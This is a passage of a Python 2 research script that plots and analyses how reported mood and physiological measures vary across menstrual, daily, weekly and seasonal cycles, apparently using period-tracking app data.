'continuous' in emotion_pair)):
# no reliable hourly information for these features.
cycles_to_plot.remove(cycle)
if cycle in ['month', 'week_of_year'] and HEART_SUBSTRING in emotion_pair:
# don't have a full year of data for this.
cycles_to_plot.remove(cycle)
for cycle_idx, cycle in enumerate(cycles_to_plot):
plt.subplot(1, 4, cycle_idx + 1)
if (cycle == 'date_relative_to_period') and \
('derivative' in data_to_use) and \
use_20_day_menstrual_cycle:
# rare and annoying special case: if we're using the derivative estimates,
# we save the 20-day period cycle in a separate df from the 14-day period one,
# since the estimates are not identical even for overlapping time periods.
means_by_cycle_point = deepcopy(mean_data['period_20'])
else:
means_by_cycle_point = deepcopy(mean_data[cycle])
if data_to_use == 'take_simple_means_by_group_no_individual_mean':
# if data is supposed to already be zero-meaned, assert that it is.
assert(np.abs(np.sum(means_by_cycle_point['mean'] * means_by_cycle_point['size'])) < 1e-5)
xtick_kwargs = {'fontsize':20, 'rotation':90} # 'fontweight':'bold'
plt.tick_params(axis='x', length=15)
if cycle == 'weekday':
# if weekday cycle, sort and truncate names.
means_by_cycle_point = means_by_cycle_point.loc[['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday']]
xs = range(7)
short_weekday_names = list(means_by_cycle_point.index.map(lambda x:x[:3]))
plt.xticks(range(7), short_weekday_names, **xtick_kwargs)
elif cycle == 'date_relative_to_period':
# plot two weeks before and after, so filter data down slightly
if use_20_day_menstrual_cycle:
xs = list(means_by_cycle_point.index)
assert xs == range(-20, 21)
plt.xticks([-20, -15, -10, -5, 0, 5, 10, 15, 20], **xtick_kwargs)
else:
means_by_cycle_point = means_by_cycle_point.loc[means_by_cycle_point.index.map(lambda x:np.abs(x) <= 14)]
xs = list(means_by_cycle_point.index)
assert xs == range(-14, 15)
plt.xticks([-14, -7, 0, 7, 14], ['Day -14', 'Day -7', 'Day 0:\nperiod start', 'Day 7', 'Day 14'],
**xtick_kwargs)
elif cycle == 'local_hour':
if hourly_period_to_exclude is not None:
assert hourly_period_to_exclude[0] == 0
assert hourly_period_to_exclude[1] > hourly_period_to_exclude[0]
means_by_cycle_point = means_by_cycle_point.loc[means_by_cycle_point.index.map(lambda x:x > hourly_period_to_exclude[1])]
xs = list(means_by_cycle_point.index)
assert xs == range(hourly_period_to_exclude[1] + 1, 24)
plt.xticks(range(hourly_period_to_exclude[1] + 1, 24, 3), **xtick_kwargs)
else:
xs = list(means_by_cycle_point.index)
assert xs == range(24)
plt.xticks([0, 6, 12, 18], ['12AM', '6AM', '12PM', '6PM'], **xtick_kwargs)
elif cycle in ['month', 'week_of_year']:
# this is sort of gross. We parameterize seasonal cycles in two different ways
# and sometimes put them on the same plot.
# consequently, we can't just use the index as the xticks.
# Rather, we convert to day of year, so it's consistent.
if cycle == 'month':
xs = [int(datetime.datetime(2016, i, 15).strftime('%j')) for i in range(1, 13)]
# little bit of missing month data for 2017, since our data ends before year end.
if (substratification == 'by_start_year') and (substratification_level == '2017'):
assert list(means_by_cycle_point.index) == range(1, 12)
else:
assert list(means_by_cycle_point.index) == range(1, 13)
else:
xs = list(means_by_cycle_point.index * 7.)
assert xs == range(0, 52 * 7, 7)
plt.xticks([int(datetime.datetime(2016, a, 15).strftime('%j')) for a in [1, 4, 7, 10]],
['Jan', 'Apr', 'Jul', 'Oct'], **xtick_kwargs)
else:
raise Exception("Not a valid cycle!!")
ys = means_by_cycle_point['mean'].values
errs = means_by_cycle_point['err'].values
if np.abs(np.mean(ys)) > 1e-8:
# if data is not already zero-meaned, zero-mean it.
ys = ys - ys.mean()
if 'continuous' not in emotion_pair:
ys = ys * 100
errs = errs * 100
if different_colors_for_each_cycle:
if cycle == 'date_relative_to_period':
color_for_line = PERIOD_CYCLE_COLOR
elif cycle == 'local_hour':
color_for_line = HOUR_CYCLE_COLOR
elif cycle == 'weekday':
color_for_line = WEEKDAY_CYCLE_COLOR
else:
color_for_line = SEASONAL_CYCLE_COLOR
else:
if colors_for_lines is not None:
color_for_line = colors_for_lines[substratification_level]
else:
color_for_line = [(lines_plotted + 1.0) / n_lines_to_plot, 0, 0]
plt.errorbar(xs,
ys,
yerr = errs if show_errorbars else None,
label = substratification_level,
color = color_for_line)
if (use_expanded_seasonal_x_axis) and cycle in ['month', 'week_of_year']:
xlims = [0, 51*7]
else:
xlims = [min(xs), max(xs)]
plt.plot(xlims, [0, 0], color = 'black')
if len(sorted_levels) == 1:
maximum_delta = ys.max() - ys.min()
# if there is only one line being plotted, print out the maximum change.
if include_amplitudes_in_title:
if 'continuous' in emotion_pair:
plt.title(PRETTY_CYCLE_NAMES[cycle] + ' $\Delta$: %2.2f' % maximum_delta, fontsize = 20) # , fontweight='bold'
else:
plt.title(PRETTY_CYCLE_NAMES[cycle] + ' $\Delta$: %2.1f%%' % maximum_delta, fontsize = 20) # , fontweight='bold'
else:
plt.title(PRETTY_CYCLE_NAMES[cycle], fontsize = 20)
else:
plt.title(PRETTY_CYCLE_NAMES[cycle], fontsize=20)
plt.xlim(xlims)
ylimit = ylimits_by_pair[emotion_pair]
plt.ylim([-ylimit, ylimit])
if cycle_idx == 0:
good_symptom, bad_symptom = emotion_pair.split('_versus_')
good_symptom = good_symptom.split('*')[1].replace('_', ' ').replace('didnt', "didn't")
bad_symptom = bad_symptom.split('*')[1].replace('_', ' ').replace('didnt', "didn't")
#plt.ylabel("Change relative to baseline", fontsize = 16)
if BBT_SUBSTRING in emotion_pair:
plt.yticks([-ylimit, 0, ylimit], fontsize=20) # , fontweight='bold'
plt.ylabel("Change in BBT (deg F)", fontsize=20)
elif HEART_SUBSTRING in emotion_pair:
plt.yticks([-ylimit, 0, ylimit], fontsize=20)
plt.ylabel("Change in RHR (BPM)", fontsize=20)
elif WEIGHT_SUBSTRING in emotion_pair:
plt.yticks([-ylimit, 0, ylimit], fontsize=20)
plt.ylabel("Change in weight (LB)", fontsize=20)
else:
plt.yticks([-ylimit, 0, ylimit],
['%i%% more %s\n' % (ylimit, bad_symptom),
'Baseline',
'%i%% more %s' % (ylimit, good_symptom)],
fontsize=20)
else:
plt.yticks([])
if cycle_idx == len(cycles_to_plot) - 1:
if substratification != 'no_substratification' and (len(sorted_levels) > 1):
plt.legend(prop={'size':16}, bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.)
lines_plotted += 1
if substratification != 'no_substratification' and (len(sorted_levels) > 1):
plt.subplots_adjust(top=.92, bottom=.35, left=.28, right=.8)
else:
plt.subplots_adjust(top=.92, bottom=.35, left=.28)
suptitle_string = 'emotion pair: %s\nsubstratification: %s\ndata source: %s, 20-day-cycle: %s' % (emotion_pair,
substratification,
data_to_use,
use_20_day_menstrual_cycle)
if suptitle:
plt.suptitle(suptitle_string, fontsize=20)
else:
print(suptitle_string)
if figname is not None:
plt.savefig(figname, dpi=300)
plt.show()
warnings.resetwarnings()
def get_hemisphere_of_timezone(tz):
"""
Checked. Returns the hemisphere of the most common timezones or raises an exception if we haven't figured out the hemisphere.
Some of the Southern TZs are right on the equator.
Broadly the division is: South America + Australia = Southern list; Europe, USA, Canada, Mexico = Northern list.
The exception is Caracas, which is in South America but is in the Northern hemisphere.
Some of the Brazilian TZs are quite close to the equator, as is America/Guayaquil, so in general Northern TZs are farther
North than Southern TZs are South.
"""
northern_timezones = ['Europe/Berlin',
'Europe/Lisbon',
'Europe/Paris',
'Europe/Rome',
'Europe/London',
'Europe/Copenhagen',
'America/Denver',
'Europe/Moscow',
'America/Chicago',
'Europe/Madrid',
'America/Los_Angeles',
'America/New_York',
'America/Vancouver',
'America/Toronto',
'America/Mexico_City',
'America/Caracas']
southern_timezones = ['America/Buenos_Aires',
'Australia/Melbourne',
'Australia/Sydney',
'America/Lima',
'America/Recife',
'America/Santiago',
'America/Fortaleza',
'America/Sao_Paulo',
'America/Guayaquil']
if tz in northern_timezones:
return 'Northern'
if tz in southern_timezones:
return 'Southern'
raise Exception("Not a valid timezone")
def order_subcategories(l, category_type):
"""
small helper method used by make_plots_stratified_by_category_type to put things in order. Checked.
"""
if category_type == 'by_largest_timezones':
# sort by which hemisphere and then sort alphabetically.
return sorted(l, key = lambda x:get_hemisphere_of_timezone(x) + ' ' + x)[::-1]
elif str(l[0])[0] == '[':
return sorted(l, key = lambda x:float(x.split(',')[0].replace('[', '')))
else:
return sorted(l)
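# Examples of the ordering above ('by_age' is just an illustrative category_type):
#   order_subcategories(['[25, 35)', '[18, 25)'], 'by_age')  ->  ['[18, 25)', '[25, 35)']
#     (bucket labels starting with '[' are sorted by their leading number)
#   for 'by_largest_timezones', Southern-hemisphere timezones come first, and timezones
#     appear in reverse alphabetical order within each hemisphere.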
def make_plots_stratified_by_category_type(results,
category_type,
emotion_pairs=None,
cycle_types_to_plot = ['near_period',
'middle_of_night',
'weekend',
'summer',
'winter'],
data_to_use='binary_analysis_no_individual_mean',
top_margin=.8,
axis_fontsize=11):
"""
Checked.
Plots results broken down by category.
category_type is the category to substratify by.
data_to_use selects the analysis: binary_analysis_no_individual_mean (the default) or binary_analysis.
"""
assert data_to_use in ['binary_analysis_no_individual_mean', 'binary_analysis']
print 'USING DATA TYPE %s' % data_to_use
if emotion_pairs is None:
emotion_pairs = results.keys()
for emotion_pair in emotion_pairs:
good_symptom, bad_symptom = emotion_pair.split('_versus_')
results_by_cat = results[emotion_pair][category_type]
if category_type == 'no_substratification':
plt.figure(figsize = [5, 2])
elif category_type == 'by_largest_timezones': # need extra room because so many categories.
plt.figure(figsize = [15, 5])
else:
plt.figure(figsize = [len(cycle_types_to_plot) * 5, 2 + .5 * len(results_by_cat.keys())])
if category_type != 'no_substratification':
# create one subplot for each cycle type.
subplot_idx = 1
for cycle_type in cycle_types_to_plot:
plt.subplot(1, len(cycle_types_to_plot), subplot_idx)
# we want to plot the differences by subcategory for each cycle.
diffs = []
cat_levels = []
for level in order_subcategories(results_by_cat.keys(), category_type):
cat_levels.append(level)
if cycle_type in ['summer', 'winter'] and HEART_SUBSTRING in emotion_pair:
# no reliable data
diffs.append(0)
else:
diffs.append(results_by_cat[level][data_to_use]['%s_mean' % cycle_type] -
results_by_cat[level][data_to_use]['not_%s_mean' % cycle_type])
if subplot_idx == 1:
# make sure category levels are in same order across subplots, if not something is very weird
original_cat_levels = cat_levels
else:
assert cat_levels == original_cat_levels
assert sum(np.isnan(diffs)) == 0
assert len(diffs) == len(results_by_cat.keys())
plt.barh(range(len(diffs)),
diffs,
color = ['blue' if x < 0 else 'red' for x in diffs])
if subplot_idx == 1:
plt.yticks(range(len(diffs)),
[str(a).replace('_', ' ').replace('America/', '').replace('Europe/', '') for a in cat_levels],
fontsize=axis_fontsize)
plt.ylabel(category_type.replace('by_', '').replace('_', ' '), fontsize=axis_fontsize)
else:
plt.yticks([])
if HEART_SUBSTRING in emotion_pair:
plt.xticks([-3, 3],
['-3\nBPM', '+3\nBPM'],
fontweight = 'bold',
fontsize=axis_fontsize)
plt.xlim([-3, 3])
elif BBT_SUBSTRING in emotion_pair:
plt.xticks([-.5, .5],
['-0.5\ndeg F', '+0.5\ndeg F'],
fontweight = 'bold',
fontsize=axis_fontsize)
plt.xlim([-.5, .5]) # keep the limits consistent with the tick positions above
elif WEIGHT_SUBSTRING in emotion_pair:
plt.xticks([-.5, .5],
['-.5 LBS', '+.5 LBS'],
fontweight = 'bold',
fontsize=axis_fontsize)
else:
plt.xticks([-.1, -.05, 0, .05, .1],
['10%', '5%', '0%', '5%', '10%'],
fontweight = 'bold',
fontsize=axis_fontsize)
plt.xlim([-.1, .1])
plt.title('%s effect' % cycle_type.replace('_' , ' '), fontweight='bold', fontsize=16)
pretty_bad_symptom_name = bad_symptom.split('*')[1].replace('_', ' ').replace('emotion', '').replace('6 hours or less', '<6 hrs')
pretty_good_symptom_name = good_symptom.split('*')[1].replace('_', ' ').replace('emotion', '').replace('6 hours or more', '>6 hrs')
# put bad symptom first because it's on the left in the plot.
plt.suptitle('<-%s vs. %s->' % (pretty_bad_symptom_name,
pretty_good_symptom_name),
fontweight='bold',
fontsize=16)
subplot_idx += 1
else:
# if we're not substratifying,
# we just want to make a simple plot with one bar for each type of cycle.
diffs_by_cycle_type = []
for cycle_type in cycle_types_to_plot:
diffs_by_cycle_type.append(results_by_cat[data_to_use]['%s_mean' % cycle_type] -
results_by_cat[data_to_use]['not_%s_mean' % cycle_type])
assert sum(np.isnan(diffs_by_cycle_type)) == 0
barwidth = .8
plt.barh(range(len(diffs_by_cycle_type)),
diffs_by_cycle_type,
color = ['blue' if x < 0 else 'red' for x in diffs_by_cycle_type], height = barwidth)
plt.yticks(range(len(diffs_by_cycle_type)),
[str(a).replace('_', ' ') for a in cycle_types_to_plot],
fontweight = 'bold')
plt.xlim([-.18, .18]) # we put the positive/negative emotion labels at the extreme xticks.
plt.xticks([-.18, -.1, 0, .1, .18],
[bad_symptom.split('*')[1].replace('_', ' '),
'10%', '0%', '10%',
good_symptom.split('*')[1].replace('_', ' ')], fontweight = 'bold')
ylimits = [-.2 - barwidth / 2, 4 + barwidth / 2 + .2]
plt.plot([0, 0], ylimits, color = 'black')
plt.ylim(ylimits)
plt.subplots_adjust(left = .2)
plt.title(data_to_use)
plt.subplots_adjust(wspace = .15, hspace = .4, top = top_margin)
plt.show()
def make_simple_histograms_of_individual_effects(individual_effects_df, plot_titlestring, min_obs):
"""
Make histograms of individual-level effects for people who have at least min_obs observations in both binary bins.
Checked.
Main argument is individual_effects_df, which is a dataframe with individual effects.
"""
data = deepcopy(individual_effects_df)
binary_variables = ['near_period', 'middle_of_night', 'weekend', 'winter', 'summer']
plt.figure(figsize=[20, 3])
for i, binary_variable in enumerate(binary_variables):
plt.subplot(1, 5, i + 1)
# filter for people who have a minimum of n_obs with binary_variable = True and n_obs with binary_variable = False
have_enough_obs = (data['%s_n_obs' % binary_variable] >= min_obs) & (data['%s_n_obs' % binary_variable] <= data['n_obs'] - min_obs)
percent_with_enough_obs = 100 * have_enough_obs.mean()
individual_effects = 100 * data['%s_cycle_effect' % binary_variable].loc[have_enough_obs].values
mu = individual_effects.mean()
absolute_mu = np.abs(individual_effects).mean()
std = individual_effects.std()
frac_feeling_at_least_20_percent_better = 100*(individual_effects >= 20).mean()
frac_feeling_at_least_20_percent_worse = 100*(individual_effects <= -20).mean()
plt.hist(individual_effects, bins=50, range=[-100, 100])
plt.xticks([-60, -30, 0, 30, 60], ['-60%', '-30%', '0%', '30%', '60%'])
plt.xlim([-60, 60])
plt.xlabel("Change in mood")
if i == 0:
plt.ylabel("Number of people\n with this mood change")
plt.title('%s\n%2.1f%% have at least %i obs\nmu: %2.1f%%; |mu| %2.1f%%; std %2.1f%%\n\
at least 20%% better: %2.1f%%\nat least 20%% worse: %2.1f%%;\n%s' %
(plot_titlestring,
percent_with_enough_obs,
min_obs,
mu,
absolute_mu,
std,
frac_feeling_at_least_20_percent_better,
frac_feeling_at_least_20_percent_worse,
binary_variable))
plt.show()
def plot_ccdf_of_individual_effects(individual_effects_df, plot_titlestring):
"""
plot the ccdf of individual effect sizes so we can see how many people have MORE extreme cycles than a given cutoff.
individual_effects_df should be a dataframe of individual effects.
Checked.
"""
data = deepcopy(individual_effects_df)
absolute_cutoffs = range(5, 100, 5)
colors = ['red', 'black', 'blue', 'green', 'magenta']
binary_variables = ['near_period', 'middle_of_night', 'weekend', 'winter', 'summer']
# because we plot all binary effects on the same graph
# we need to make sure they're computed on the same set of people.
# so we filter for people for whom all five binary effects can be estimated.
for i, binary_variable in enumerate(binary_variables):
is_nan = np.isnan(data['%s_cycle_effect' % binary_variable])
have_zero_obs = (data['%s_n_obs' % binary_variable] == data['n_obs']) | (data['%s_n_obs' % binary_variable] == 0)
assert (is_nan == have_zero_obs).all() # make sure people with no observations are missing data.
if i == 0:
good_idxs = ~is_nan
else:
good_idxs = good_idxs & (~is_nan)
print("For %s, %2.1f%% of people have no cycle effect estimates; now have cycle estimates for %2.1f%% of people." % (
binary_variable, is_nan.mean() * 100, good_idxs.mean() * 100))
plt.figure(figsize=[12, 4])
# make two subplots: one for people who feel better, one for people who feel worse.
for feel_better in [False, True]:
plt.subplot(1, 2, 1 + feel_better)
for i, binary_variable in enumerate(binary_variables):
individual_effects = data.loc[good_idxs, '%s_cycle_effect' % binary_variable].values
individual_effects = 100.*np.array(individual_effects)
average_effect = np.mean(individual_effects)
assert sum(np.isnan(individual_effects)) == 0
percentages_whose_mood_changes_at_least_that_much = []
for abs_cutoff in absolute_cutoffs:
if feel_better:
p = 100.*np.mean(individual_effects >= abs_cutoff)
else:
p = 100.*np.mean(individual_effects <= -abs_cutoff)
percentages_whose_mood_changes_at_least_that_much.append(p)
plt.plot(absolute_cutoffs,
percentages_whose_mood_changes_at_least_that_much,
label='%s (n=%i, mean=%2.1f%%)' % (binary_variable,
len(individual_effects),
average_effect),
color=colors[i])
plt.xlim([0, 60])
plt.ylim([0, 50])
plt.xlabel("Percentage change in mood")
if feel_better:
plt.title('%s\nFeel BETTER during this period' % plot_titlestring)
else:
plt.title('%s\nFeel WORSE during this period' % plot_titlestring)
plt.ylabel("Percentage of population\nwhose mood changes this dramatically")
plt.legend()
plt.show()
def plot_means_by_date(results,
emotion_pairs,
data_to_use,
min_date,
max_date,
min_obs=500,
substratification='no_substratification',
substratification_level=None,
ylimit=10,
outliers_to_highlight=None,
plot_the_weekend=False,
period_effects_vector=None,
figname=None,
print_outlier_dates=True):
"""
Plots the means over time. Plot is zero-centered. Checked.
Currently only set up to do a single substratification level.
"""
assert type(ylimit) is int
assert data_to_use in ['means_by_date', 'means_by_date_no_individual_mean']
for emotion_pair in emotion_pairs:
if substratification == 'no_substratification':
assert substratification_level is None
data = deepcopy(results[emotion_pair][substratification][data_to_use])
else:
assert substratification_level is not None
data = deepcopy(results[emotion_pair][substratification][substratification_level][data_to_use])
data['date'] = data['date'].map(lambda x:x.split()[0]) # remove 00:00:00 at end
data = data.loc[(data['date'] >= min_date) & (data['date'] < max_date)]
print '%i dates in data between %s and %s' % (len(data), min_date, max_date)
data = data.loc[data['n_obs'] >= min_obs]
data.index = range(len(data))
print("After filtering for min_obs=%i, %i dates" % (min_obs, len(data)))
assert list(data['date']) == sorted(list(data['date'])) # make sure dates are in correct order, if not something is wrong.
# make sure dates are correctly formatted.
assert data['date'].map(lambda x:(len(x.split('-')[0]) == 4) and
(len(x.split('-')[1]) == 2) and
(len(x.split('-')[2].split()[0]) == 2)).all()
data['date'] = data['date'].map(lambda x:datetime.datetime.strptime(x, '%Y-%m-%d'))
data['mean'] = data['mean'] - data['mean'].mean()
if 'continuous' not in emotion_pair:
data['mean'] = data['mean'] * 100.
print("means are in units of percent!!")
## print out high and low dates.
if print_outlier_dates:
print 'Highest dates'
print data.sort_values(by='mean')[::-1].head(n=10)
print 'Lowest dates'
print data.sort_values(by='mean').head(n=10)
def moving_average(a, n=31) :
ret = np.cumsum(a, dtype=float)
ret[n:] = ret[n:] - ret[:-n]
return ret[n - 1:] / n
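# The cumulative-sum trick above computes a trailing n-day mean; e.g. with n=3 and
# a=[1, 2, 3, 4, 5]: cumsum=[1, 3, 6, 10, 15], after the subtraction ret=[1, 3, 6, 9, 12],
# and ret[2:]/3 = [2, 3, 4] (the means of [1,2,3], [2,3,4], [3,4,5]). The 15 Nones padded
# on each side below re-center the default 31-day window on each date.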
moving_average = (15 * [None]) + list(moving_average(data['mean'].values)) + (15 * [None])
data['rolling_average'] = moving_average
data['mean_minus_rolling_average'] = data['mean'] - data['rolling_average']
print 'Highest dates after removing rolling average'
print data.dropna(subset=['mean_minus_rolling_average']).sort_values(by='mean_minus_rolling_average')[::-1].head(n=10)
print 'Lowest after removing rolling average'
print data.dropna(subset=['mean_minus_rolling_average']).sort_values(by='mean_minus_rolling_average')[::-1].tail(n=10)
print 'Special dates'
for date in ['2016-01-01', '2016-02-14', '2016-11-09', '2016-12-25', '2017-01-01', '2017-02-14']:
print date
print data.loc[data['date'] == date]
# check for a time-trend (which could complicate analysis)
# this is actually slightly off because it assumes we have data for every single day, and that's not quite true.
# but we're only missing ~4 days so it should be okay.
slope, intercept, r_value, p_value, std_err = linregress(range(len(data)), data['mean'])
increase_per_year_in_percent = slope * 365
sorted_data = data.sort_values(by='mean')
min_val_string = 'Minimum value is %2.1f%%, occurring on %s' % (sorted_data['mean'].iloc[0],
sorted_data['date'].iloc[0])
slope_string = 'Linear trend: increase per year %2.1f%%, r^2 %2.3f' % (increase_per_year_in_percent, r_value**2)
if data_to_use == 'means_by_date':
individual_mean_string = "individual mean NOT removed"
else:
individual_mean_string = "individual mean removed"
fig = plt.figure(figsize=[24, 5])
if period_effects_vector is None:
plt.plot_date(data['date'], data['mean'], '-', label='Currently observed signal', color='black', linewidth=3)
else:
data['days_since_beginning'] = data['date'].map(lambda x:(x - data['date'].min()).days)
data['period_effect'] = data['days_since_beginning'].map(lambda x:period_effects_vector[x % len(period_effects_vector)])
data['counterfactual_signal'] = data['mean'] + data['period_effect']
plt.plot_date(data['date'], data['counterfactual_signal'], '-', label='If menstrual effect were observed', color=PERIOD_CYCLE_COLOR, linewidth=3)
plt.plot_date(data['date'], data['mean'], '-', label='Currently observed signal', color='black', linewidth=3)
if plot_the_weekend:
data['is_weekend'] = data['date'].map(lambda x:x.strftime('%A') in ['Saturday', 'Sunday'])
plt.plot_date(data['date'].loc[data['is_weekend']],
data['mean'].loc[data['is_weekend']],
label='',
color='black')
#for year in [2016, 2017]:
# plt.plot_date([datetime.datetime(year, 1, 1), datetime.datetime(year, 1, 1)], [-ylimit, ylimit], '-', color='black')
outliers_to_nice_names = {'2016-11-09':'Day after 2016 US Election',
'2016-12-25':'Christmas',
'2015-12-25':None,
'2017-06-25':'Eid al-Fitr, Saudi Arabia',
'2017-02-11':'Chinese New Year Lantern Festival',
'2017-10-12':'Lady of Aparecida Day',
'2017-09-07':'Brazilian Independence',
'2016-10-12':None}
outliers_to_colors = {'2016-11-09':'#9467bd',
'2016-12-25':'#2ca02c',
'2015-12-25':'#2ca02c',
'2017-06-25':'#2ca02c',
'2017-02-11':'#2ca02c',
'2017-10-12':'#2ca02c',
'2017-09-07':'#2ca02c',
'2016-10-12':'#2ca02c'}
warning_string =''
if outliers_to_highlight is not None:
for outlier in outliers_to_highlight:
assert outlier in outliers_to_nice_names
outlier_idxs = data['date'] == datetime.datetime(*[int(a) for a in outlier.split('-')])
assert outlier_idxs.sum() == 1
val_to_plot = float(data['mean'].loc[outlier_idxs].iloc[0])
most_extreme_val_to_plot = ylimit * .95
if val_to_plot < -most_extreme_val_to_plot:
val_to_plot = -most_extreme_val_to_plot
warning_string += '\nWARNING: EXTREME VALUE %s has been truncated' % outlier
elif val_to_plot > most_extreme_val_to_plot:
val_to_plot = most_extreme_val_to_plot
warning_string += '\nWARNING: EXTREME VALUE %s has been truncated' % outlier
plt.plot_date(data['date'].loc[outlier_idxs],
[val_to_plot],
color=outliers_to_colors[outlier],
label=outliers_to_nice_names[outlier],
markersize=13)
#plt.plot_date([data['date'].loc[outlier_idxs].values[0],
# data['date'].loc[outlier_idxs].values[0]],
## [-ylimit, ylimit],
# color=outliers_to_colors[outlier],
# label=outliers_to_nice_names[outlier],
# linestyle='--')
plt.title('%s\n%s\n%s\n%s\nsubstratification: %s, val: %s%s\n' % (emotion_pair,
min_val_string,
slope_string,
individual_mean_string,
substratification,
substratification_level,
warning_string))
plt.legend(prop={'size':20}, bbox_transform=fig.transFigure, bbox_to_anchor=(.68, .7)) #'weight':'bold'
plt.subplots_adjust(right=.68)
#plt.legend(prop={'size':18, 'weight':'bold'})
assert ylimit > 0
plt.ylim([-ylimit, ylimit])
plt.xlim([data['date'].min(), data['date'].max()])
#plt.plot_date([data['date'].min(), data['date'].max()], [0, 0], linestyle='--', color='grey')
good_symptom, bad_symptom = emotion_pair.split('_versus_')
good_symptom = good_symptom.split('*')[1]
bad_symptom = bad_symptom.split('*')[1]
if 'continuous' not in emotion_pair:
assert ylimit % 2 == 0
plt.yticks([-ylimit / 2, 0, ylimit / 2],
['%i%% more %s' % (ylimit / 2, bad_symptom),
'Baseline',
'%i%% more %s' % (ylimit / 2, good_symptom)],
fontsize=22)
date_ticks = [datetime.datetime(2016, 1, 1),
datetime.datetime(2016, 4, 1),
datetime.datetime(2016, 7, 1),
datetime.datetime(2016, 10, 1),
datetime.datetime(2017, 1, 1),
datetime.datetime(2017, 4, 1),
datetime.datetime(2017, 7, 1),
datetime.datetime(2017, 10, 1)]
date_ticks = [tick for tick in date_ticks if tick >= data['date'].min() and tick <= data['date'].max()]
plt.xticks(date_ticks, [x.strftime('%Y-%m') for x in date_ticks], fontsize=22)
if figname is not None:
plt.savefig(figname, dpi=300)
plt.show()
def add_binary_annotations(d, start_day_for_period_individual_effect, end_day_for_period_individual_effect):
# Checked.
assert start_day_for_period_individual_effect is not None
assert end_day_for_period_individual_effect is not None
d['weekend'] = d['weekday'].map(lambda x:x in ['Saturday', 'Sunday'])
d['summer'] = d['month'].map(lambda x:get_season(x) == 'summer')
d['winter'] = d['month'].map(lambda x:get_season(x) == 'winter')
d['near_period'] = d['date_relative_to_period'].map(lambda x:(x >= start_day_for_period_individual_effect) and
(x < end_day_for_period_individual_effect))
d['middle_of_night'] = d['local_hour'].map(in_middle_of_night)
return d
def remove_individual_means_from_df(d):
"""
Checked. For each individual, removes their mean value, consistent with Golder + Macy Science paper.
"""
d = deepcopy(d)
individual_means = d[['user_id_hash', 'good_mood']].groupby('user_id_hash').mean()
individual_means = dict(zip(individual_means.index, individual_means['good_mood']))
d['individual_mean'] = d['user_id_hash'].map(lambda x:individual_means[x])
d['good_mood'] = d['good_mood'] - d['individual_mean']
assert abs(d[['user_id_hash', 'good_mood']].groupby('user_id_hash').mean()).values.max() < 1e-8
return d
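# Tiny illustration of the de-meaning above: a user whose good_mood values are
# [1, 0, 1] has an individual mean of 2/3, so after this function their values
# become [1/3, -2/3, 1/3] (and every user's de-meaned values sum to ~0, as the assert checks).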
def compute_means_by_date(d, remove_individual_means):
"""
Checked.
Returns a dataframe with the fraction of people who report positive emotion on each date
along with the number of observations on that date.
"""
d = deepcopy(d)
if remove_individual_means:
d = remove_individual_means_from_df(d)
means_by_date = d[['good_mood', 'date']].groupby('date').agg(['mean', 'size'])
# Reformat data so it doesn't have a weird multi-index and make sure it's in sorted order.
means_by_date.columns = ['mean', 'n_obs']
means_by_date['date'] = means_by_date.index
del means_by_date.index.name
means_by_date = means_by_date.sort_values(by='date')
means_by_date.index = range(len(means_by_date))
return means_by_date
def compute_diffs_in_binary_variable(d, remove_individual_means, start_day_for_period_individual_effect, end_day_for_period_individual_effect):
"""
Computes the mean of the outcome during and outside each binary time period (summer, winter, weekend, middle of night, near period) and returns them in a dictionary.
Checked.
"""
d = deepcopy(d)
d = add_binary_annotations(d, start_day_for_period_individual_effect, end_day_for_period_individual_effect)
if remove_individual_means:
d = remove_individual_means_from_df(d)
results = {}
for time_period in ['summer', 'winter', 'weekend', 'middle_of_night', 'near_period']:
results['%s_mean' % time_period] = d['good_mood'].loc[d[time_period] == 1].mean()
results['not_%s_mean' % time_period] = d['good_mood'].loc[d[time_period] == 0].mean()
results['n'] = len(d)
return results
def take_simple_means_by_group(d, remove_individual_means):
"""
rather than doing a regression or anything fancy, just does a groupby to get counts and means for each group.
Checked.
"""
d = deepcopy(d)
if remove_individual_means:
d = remove_individual_means_from_df(d)
results = {}
for grouping_variable in ['month', 'weekday', 'local_hour', 'date_relative_to_period']:
summary_stats = ['mean', 'size', 'std']
grouped_d = d[[grouping_variable, 'good_mood']].groupby(grouping_variable).agg(summary_stats)
grouped_d.columns = summary_stats
grouped_d['err'] = 1.96 * grouped_d['std']/np.sqrt(grouped_d['size'])
grouped_d = grouped_d[['mean', 'size', 'err']]
results[grouping_variable] = grouped_d
return results
def find_interaction_between_cycles(d, remove_individual_means, start_day_for_period_individual_effect, end_day_for_period_individual_effect):
"""
assesses whether there are interactions between cycles (not user-specific). Checked.
"""
results = {'linear_regression':{},
'raw_means':{}}
print "assessing non-user-specific interaction between cycles"
d = deepcopy(d)
d = add_binary_annotations(d, start_day_for_period_individual_effect, end_day_for_period_individual_effect)
d['good_mood'] = 1.0 * d['good_mood']
if remove_individual_means:
d = remove_individual_means_from_df(d)
boolean_cols = ['near_period', 'middle_of_night', 'weekend', 'summer', 'winter']
for i in range(len(boolean_cols)):
for j in range(i):
if boolean_cols[i] == 'winter' and boolean_cols[j] == 'summer':
# singular matrix (these are mutually exclusive)
continue
key = '%s*%s' % (boolean_cols[i], boolean_cols[j])
raw_means = d[['good_mood', boolean_cols[i], boolean_cols[j]]].groupby([boolean_cols[i], boolean_cols[j]]).mean()
print 'results for', key
print raw_means
model = sm.OLS.from_formula('good_mood ~ %s*%s' % (boolean_cols[i], boolean_cols[j]), data = d).fit()
print model.summary()
results['linear_regression'][key] = {'pvalues':model.pvalues, 'betas':model.params}
results['raw_means'][key] = raw_means
return results
def compute_individual_level_cycle_effects(d, start_day_for_period_individual_effect, end_day_for_period_individual_effect):
"""
compute the individual cycle effects by person. Checked
Does not remove the mean for each individual prior to computing individual cycle-level effects (but this shouldn't matter).
"""
raise Exception("This is deprecated!")
print("Computing individual-level cycle effects.")
boolean_cols = ['near_period', 'middle_of_night', 'weekend', 'summer', 'winter']
d = deepcopy(d)
d = add_binary_annotations(d, start_day_for_period_individual_effect, end_day_for_period_individual_effect)
grouped_d = d.groupby('user_id_hash')
print("Done grouping data")
# results data format is a little odd here. one list entry for each user.
# each list entry is a dictionary: keys are number of observations and cycle effects.
results = []
total_users = len(set(d['user_id_hash']))
n_users_examined = 0
for user, user_d in grouped_d:
n_users_examined += 1
user_results = {}
n = len(user_d)
user_results['n_obs'] = n
user_results['user_mean'] = user_d['good_mood'].mean()
for boolean_col in boolean_cols:
n_in_cycle = user_d[boolean_col].sum()
